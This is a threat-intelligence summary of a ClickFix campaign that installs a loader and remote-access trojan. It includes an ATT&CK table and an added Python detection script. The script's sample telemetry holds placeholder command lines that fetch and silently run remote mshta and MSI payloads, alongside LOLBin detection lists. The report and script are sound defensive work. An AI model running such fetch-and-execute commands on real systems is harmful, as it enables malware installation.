EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated group that habitually uses the ClickFix social‐engineering technique to gain footholds on corporate networks. It delivers a custom loader that subsequently installs remote‐access tools, classifying the operation as a multi‐stage ransomware‐adjacent intrusion. Targets include medium‐to‐large enterprises in the finance, healthcare, and manufacturing sectors across North America and Europe. The primary objective is to harvest credential stores and browser cookies, then expand laterally to maintain persistent control for potential ransom or data‐exfiltration and espionage.
The infection begins when a user follows a seemingly legitimate ClickFix prompt in the Windows Run dialog, causing the system to download and silently execute an MSI package. The package drops the Potemkin loader, which uses a deterministic domain‐generation algorithm to locate its command‐and‐control server and reflectively loads the RMMProject remote‐access trojan. Once resident, the trojan creates a Run‐registry entry for persistence, harvests browser credentials, and opens reverse tunnels to bypass outbound filters. Lateral spread is achieved through WMI and SMB execution, while the attacker disables security services to avoid detection.
This threat matters because its use of reflective loading, domain‐generation, and legitimate system utilities makes it hard for traditional antivirus solutions to spot the malicious activity. The ability to disable endpoint protection and maintain hidden tunnels prolongs dwell time, increasing the risk of extensive data loss and operational disruption. Organizations should enforce strict controls on the Windows Run dialog, deploy comprehensive endpoint monitoring, and block outbound connections to unknown domains. Regular audits of registry persistence mechanisms, multi‐factor authentication for privileged accounts, and reliable offline backups further reduce the attack surface and improve recovery prospects.
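The two paragraphs above describe the execution chain (a Run-dialog launched proxy binary or PowerShell pulling a silent MSI) and the controls a defender should apply (monitoring the endpoint and auditing Run-key persistence). The following Python script is an added example of that detection logic and is not code from the original report or from the vendors cited below. It runs over constructed, Sysmon-style process-creation records and constructed Run-key entries; the field names (ParentImage, Image, CommandLine, Key, Name, Data), the sample paths and the example.invalid host are all assumptions made for the example, and the flagging thresholds are illustrative rather than a tested rule set.

```python
"""Added example: detection checks for the ClickFix execution chain and
Run-key persistence described in the report. Sample events are constructed."""
from __future__ import annotations

import re

# Binaries the report's threat profile lists as execution proxies
# (T1218.005 mshta, T1218.010 regsvr32, T1059.001 PowerShell) plus msiexec,
# which installs the silently downloaded MSI package.
LOLBINS = {"mshta.exe", "regsvr32.exe", "powershell.exe", "pwsh.exe", "msiexec.exe"}

# Signals that separate a ClickFix launch from an ordinary interactive run:
# a remote URL handed to the binary, or silent/hidden/encoded execution flags.
URL_RE = re.compile(r"https?://", re.IGNORECASE)
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-enc\w*|-w(?:indowstyle)?\s+hidden|/i\s+https?://|/qn|/quiet)"
)

# Locations a standard user can write to; legitimate autostarts in these
# paths are not unknown, but combined with other signals they merit review.
USER_WRITABLE = re.compile(r"(?i)\\(users\\[^\\]+\\appdata|programdata|temp|public)\\")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_clickfix_execution(event: dict) -> list[str]:
    """Return the reasons an event matches the ClickFix pattern; empty if none.

    Two independent signals are required so that a user double-clicking a
    PowerShell shortcut under explorer.exe does not fire on its own."""
    reasons: list[str] = []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image not in LOLBINS:
        return reasons
    if parent == "explorer.exe":
        reasons.append(f"{image} started directly under explorer.exe (Run dialog pattern)")
    if URL_RE.search(cmd):
        reasons.append("remote URL on command line")
    if SUSPICIOUS_ARGS.search(cmd):
        reasons.append("silent, hidden or encoded execution flags")
    return reasons if len(reasons) >= 2 else []


def _target_of(data: str) -> str:
    """Extract the executable path from a Run-key value, quoted or not."""
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    m = re.match(r"(?i)(.+?\.exe)", data)
    return m.group(1) if m else data.split(" ", 1)[0]


def audit_run_entries(entries: list[dict]) -> list[dict]:
    """Flag Run-key values (T1547.001) that autostart via a script host or
    proxy binary, or whose target lives in a user-writable directory."""
    findings = []
    for entry in entries:
        data = entry["Data"]
        exe_name = _basename(_target_of(data))
        reasons = []
        if exe_name in LOLBINS or exe_name in {"rundll32.exe", "cmd.exe", "wscript.exe", "cscript.exe"}:
            reasons.append("autostart via script host or proxy binary")
        if USER_WRITABLE.search(data):
            reasons.append("target in user-writable location")
        if reasons:
            findings.append({"Key": entry["Key"], "Name": entry["Name"], "Reasons": reasons})
    return findings


# Constructed sample telemetry (not real events); example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /i https://example.invalid/update.msi /qn"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /V"},  # Windows Installer service instance, benign
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Program Files\Editor\editor.exe",
     "CommandLine": "editor.exe notes.txt"},  # ordinary application launch
]

# Constructed Run-key export; names and paths are made up for the example.
SAMPLE_RUN_ENTRIES = [
    {"Key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Name": "OneDriveSync",
     "Data": r'"C:\Users\alice\AppData\Roaming\svc\updater.exe" /s'},
    {"Key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Name": "Helper",
     "Data": r"regsvr32.exe /s /u C:\Users\alice\AppData\Local\Temp\h.dll"},
    {"Key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Name": "VendorTray",
     "Data": r'"C:\Program Files\Vendor\tray.exe" --minimized'},
]


def run_detections(events: list[dict] = SAMPLE_EVENTS,
                   run_entries: list[dict] = SAMPLE_RUN_ENTRIES) -> dict:
    """Apply both checks and return the hits so callers can assert on them."""
    execution = [(e["CommandLine"], flag_clickfix_execution(e))
                 for e in events if flag_clickfix_execution(e)]
    return {"execution": execution, "persistence": audit_run_entries(run_entries)}


if __name__ == "__main__":
    for cmd, why in run_detections()["execution"]:
        print("EXECUTION:", cmd, "->", "; ".join(why))
    for f in run_detections()["persistence"]:
        print("PERSISTENCE:", f["Key"], f["Name"], "->", "; ".join(f["Reasons"]))
```

On the sample data the first two process events are flagged (explorer.exe parent plus a URL, and the second also carries the silent-install flag), the service-spawned msiexec and the editor are not, and two of the three Run-key entries are reported. In production the same checks would consume Sysmon Event ID 1 records and a registry export of the Run keys; the thresholds and path patterns should be tuned against a baseline of the environment's legitimate autostarts.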
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| --- | --- | --- | --- |
| Execution | T1204 | User Execution | — |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Defense Evasion | T1218.010 | System Binary Proxy Execution | Regsvr32 |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1562.001 | Impair Defenses | Disable or Modify Tools |
| Defense Evasion | T1036.005 | Masquerading | Match Legitimate Name or Location |
| Privilege Escalation | T1055.001 | Process Injection | Dynamic-link Library Injection |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Lateral Movement | T1047 | Windows Management Instrumentation | — |
| Lateral Movement | T1021.002 | Remote Services | SMB/Windows Admin Shares |
| Command and Control | T1568.002 | Dynamic Resolution | Domain Generation Algorithms |
REFERENCES:
The following reports contain further technical details:
https://www.huntress.com/blog/potemkin-loader-rmmproject-clickfix-attack
https://cybersecuritynews.com/hackers-use-clickfix-prompt-to-install-msi-package/